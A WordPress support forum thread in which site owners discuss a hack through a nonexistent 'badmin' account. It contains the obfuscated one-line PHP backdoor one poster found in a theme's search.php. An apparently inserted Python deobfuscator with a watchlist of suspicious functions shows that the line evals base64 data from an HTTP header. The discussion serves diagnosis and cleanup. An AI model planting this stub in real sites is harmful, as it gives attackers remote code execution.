A few days back my Wordfence plugin alerted me to the fact that a user from Russia logged in using the username “badmin”, who had all administrative rights.

    I checked the “functions.php” and sure enough, I had a base64 code embedded in the beginning.

    What I’m asking is how did the hacker log into the site with a non-existent username, let alone have full administrative rights?

    When I deleted the malicious code from functions.php, I checked if perhaps he had added any new administrative usernames directly into the database before logging in, but I couldn’t find the “badmin” username anywhere.

    Thank you for your answer.

Viewing 7 replies - 1 through 7 (of 7 total)
    Moderator t-p

    (@t-p)

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Had this same hack by the same user happen to a site I host a few days ago. Functions.php also was injected with base64 code. I would guess this is a bot exploiting an issue with a plugin as I do not have the same theme as you. Perhaps Wordfence is the issue? Can you list your plugins and versions so that we can compare and find the cause of this.

    Thread Starter BioB

    (@biob)

    I use the theme Unoblog by ThemeBounce, ver. 1.3 (it’s probably not the site you checked out because I run several WP blogs).

    My WordPress is version 4.3.1

    I have updated two plugins today or yesterday. One of them, incidentally, was Wordfence, I now run ver. 6.0.19 but before it was most probably 6.0.18.

    I’m pretty sure the other one was Akismet, which is now ver. 3.1.4. I don’t even know why I keep this plugin as I don’t use it. It’s the most probable source of attack.

    Yoast SEO ver. 2.3.5 could be another likely candidate. I think it very recently automatically updated and that it was ver. 2.3.4 before.

    Yet another widely used plugin that could be the target of the attack is Cookie Law Info ver. 1.5.3 by Richard Ashby.

    For now I deleted the base64 code from the functions.php and blocked the user’s IP. I know, though, that the script probably spammed my entire site with new files with malicious code inside (once before I had a problem with this and it cost me some money to get it repaired).

    I’m only sorry I deleted the code and didn’t store it. I could post it here for some back-engineering. Nah, well. I hope it won’t happen again.

    It also seems like the hacker got in with the first attempt. Many others try every day and get denied by Wordfence and I get emails about such attempts every day…

    Moderator t-p

    (@t-p)

    If you guys suspect any plugin then please bring it to the attention of its developers so that they can look into the issue and take appropriate measures.

    Richard

    (@richardashby)

    Hi, I’m the author of Cookie Law Info. There’s nothing in the code of that plugin to relate to that kind of attack, and all inputs and database reads are heavily sanitised to eliminate potential attacks. If you do have more information once you have done an analysis please contact me via cookielawinfo.com and I will of course take a look. For now though I would look at other sources especially other user accounts and login attempts where that user account may have been created. Regards, Richard

    Thread Starter BioB

    (@biob)

    I don’t know what to suspect, unfortunately. I just put out some possibilities because those plugins are widely used and might be targets, that’s all.

    Sorry, Richard. I love your plugin, by the way.

    I did some more digging, though, and in my UnoBlog theme the file search.php was modified on the day the hacker got in and it had an additional line of code at the very top:

    <?php $pekyg = 'rMNfN14n*UO3sb2TFa1Te0v_fO6JTGnY/40_8zA9obHeueW.kgHwpvGPtXwRpr_UeasohEcle7Cig25.e36Uyeipmq4dMbK9ucKBz9Sa0gTee8Wj1IDAFq4Q/dXOeeQQTl5I7282pEcsrP'; $ptcfnjsmzcvk = $pekyg[50].$pekyg[28].$pekyg[15].$pekyg[141].$pekyg[62].$pekyg[55].$pekyg[10].$pekyg[128].$pekyg[98].$pekyg[99].$pekyg[25].$pekyg[38].$pekyg[63].$pekyg[106].$pekyg[126]; $kgtmtzrhpn = $pekyg[105].$pekyg[43].$pekyg[56].$pekyg[124].$pekyg[7].$pekyg[53]; $lqfvtkarmb = $pekyg[136].$pekyg[0].$pekyg[125].$pekyg[49].$pekyg[23].$pekyg[140].$pekyg[85].$pekyg[60].$pekyg[71].$pekyg[17].$pekyg[97].$pekyg[80]; $goblsqeuxg = $pekyg[13].$pekyg[65].$pekyg[139].$pekyg[108].$pekyg[82].$pekyg[90].$pekyg[35].$pekyg[91].$pekyg[45].$pekyg[138].$pekyg[40].$pekyg[121].$pekyg[64]; $ojcapxvzcr = $pekyg[120].$pekyg[47].$pekyg[8].$pekyg[32].$pekyg[107]; $qingnmtaec = $pekyg[79]; $ckwovrefmyof = $kgtmtzrhpn($ptcfnjsmzcvk); $lqfvtkarmb ($ojcapxvzcr , $goblsqeuxg($ckwovrefmyof) , $qingnmtaec); ?>

    Very standard for this kind of a hack. I’ll check other files as well.

    The attack happened on Oct. 4, 2015.
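The line quoted above is a common obfuscation style: one long string, and every function name and argument assembled by indexing single characters out of it. Below is an added example, not code from the thread, from WordPress or from any plugin named here: a small Python script that statically resolves that pattern, prints the reconstructed call, and lists the indicator functions a defender would then grep a site's files for. The sample input is the exact line from the post; the function names `resolve_all`, `deobfuscate` and `indicators` and the watchlist of suspicious PHP functions are my own choices.

```python
import re

# Sample input: the obfuscated line quoted in the thread (top of the modified
# search.php), split only at statement boundaries so the script runs offline.
SAMPLE = """<?php $pekyg = 'rMNfN14n*UO3sb2TFa1Te0v_fO6JTGnY/40_8zA9obHeueW.kgHwpvGPtXwRpr_UeasohEcle7Cig25.e36Uyeipmq4dMbK9ucKBz9Sa0gTee8Wj1IDAFq4Q/dXOeeQQTl5I7282pEcsrP';
$ptcfnjsmzcvk = $pekyg[50].$pekyg[28].$pekyg[15].$pekyg[141].$pekyg[62].$pekyg[55].$pekyg[10].$pekyg[128].$pekyg[98].$pekyg[99].$pekyg[25].$pekyg[38].$pekyg[63].$pekyg[106].$pekyg[126];
$kgtmtzrhpn = $pekyg[105].$pekyg[43].$pekyg[56].$pekyg[124].$pekyg[7].$pekyg[53];
$lqfvtkarmb = $pekyg[136].$pekyg[0].$pekyg[125].$pekyg[49].$pekyg[23].$pekyg[140].$pekyg[85].$pekyg[60].$pekyg[71].$pekyg[17].$pekyg[97].$pekyg[80];
$goblsqeuxg = $pekyg[13].$pekyg[65].$pekyg[139].$pekyg[108].$pekyg[82].$pekyg[90].$pekyg[35].$pekyg[91].$pekyg[45].$pekyg[138].$pekyg[40].$pekyg[121].$pekyg[64];
$ojcapxvzcr = $pekyg[120].$pekyg[47].$pekyg[8].$pekyg[32].$pekyg[107];
$qingnmtaec = $pekyg[79];
$ckwovrefmyof = $kgtmtzrhpn($ptcfnjsmzcvk);
$lqfvtkarmb ($ojcapxvzcr , $goblsqeuxg($ckwovrefmyof) , $qingnmtaec); ?>"""

# $name = 'single-quoted literal';
LITERAL = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# $name = $src[12].$src[3]...;  (string built from single characters)
INDEXED = re.compile(r"\$(\w+)\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);")
PIECE = re.compile(r"\$(\w+)\[(\d+)\]")
# a variable, optionally used as a callee ("$v(" or "$v (")
VAR_OR_CALL = re.compile(r"\$(\w+)(\s*\()?")

# Functions whose presence in a reconstructed call is worth flagging (my list).
SUSPICIOUS = {"preg_replace", "base64_decode", "getenv", "eval", "assert",
              "create_function", "gzinflate", "str_rot13", "system", "shell_exec"}


def resolve_all(src):
    """Map variable name -> plain string for every literal and every
    character-indexed concatenation that can be resolved statically."""
    resolved = {}
    for name, text in LITERAL.findall(src):
        resolved[name] = text.replace("\\'", "'").replace("\\\\", "\\")
    for name, expr in INDEXED.findall(src):
        try:
            resolved[name] = "".join(resolved[v][int(i)] for v, i in PIECE.findall(expr))
        except (KeyError, IndexError):
            continue  # indexes a string we never saw; leave it unresolved
    return resolved


def _render(expr, resolved, exprs):
    """Substitute resolved strings (bare when used as a callee, quoted
    otherwise) and previously rendered sub-expressions into one statement."""
    def sub(m):
        name, paren = m.group(1), m.group(2)
        if name in resolved:
            return resolved[name] + "(" if paren else repr(resolved[name])
        if name in exprs and not paren:
            return exprs[name]
        return m.group(0)
    return re.sub(r"\s*,\s*", ", ", VAR_OR_CALL.sub(sub, expr))


def deobfuscate(src):
    """Return the readable form of each statement that actually does
    something (i.e. is not just building a string)."""
    body = re.sub(r"^<\?php\s*|\s*\?>$", "", src.strip())
    resolved = resolve_all(body)
    exprs, rendered = {}, []
    # Naive split on ';' is fine for one-line stubs like this one.
    for stmt in (s.strip() for s in body.split(";")):
        if not stmt:
            continue
        m = re.match(r"\$(\w+)\s*=\s*(.*)$", stmt, re.S)
        if m and m.group(1) in resolved:
            continue                      # pure string-building assignment
        if m:                             # assignment of a call result
            exprs[m.group(1)] = _render(m.group(2), resolved, exprs)
            continue
        rendered.append(_render(stmt, resolved, exprs))
    return rendered


def indicators(rendered):
    """Names from the watchlist that appear as calls, plus a flag for a
    regex literal whose modifiers include 'e' (eval of the replacement)."""
    found = set()
    for stmt in rendered:
        found.update(f for f in SUSPICIOUS if re.search(r"\b%s\s*\(" % f, stmt))
        if "preg_replace" in stmt and re.search(r"/[a-zA-Z]*e[a-zA-Z]*'", stmt):
            found.add("preg_replace /e modifier")
    return sorted(found)


if __name__ == "__main__":
    calls = deobfuscate(SAMPLE)
    for c in calls:
        print(c)
    print("indicators:", ", ".join(indicators(calls)))
```

Resolving the sample shows what the one-liner actually does: `preg_replace` with the `/e` modifier, which evaluates its replacement argument as PHP, applied to base64-decoded content read with `getenv` from an HTTP request header. In other words, anyone who sends that header to search.php runs arbitrary PHP inside WordPress on every request, and such code can act with any privilege it likes whether or not a matching row exists in the users table. Two practical takeaways for cleanup: the resolved header name is a useful thing to search the web server's access logs for, and `preg_replace` with `/e`, `base64_decode` and `getenv('HTTP_` are cheap strings to grep for across a theme or plugin directory, since legitimate theme files almost never need them. The `/e` modifier was deprecated in PHP 5.5 and removed in PHP 7, so this particular stub only works on older PHP versions, but the same construction with `eval` or `assert` does not have that limitation.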

    apottlh

    (@apottlh)

    Same thing happened to me. The only plugin I have in common with the comments above is Wordfence. Looked up the issue at the time but didn’t see anyone else posting on it. Glad I checked back.

The topic ‘Site hacked with a non-existent admin username’ is closed to new replies.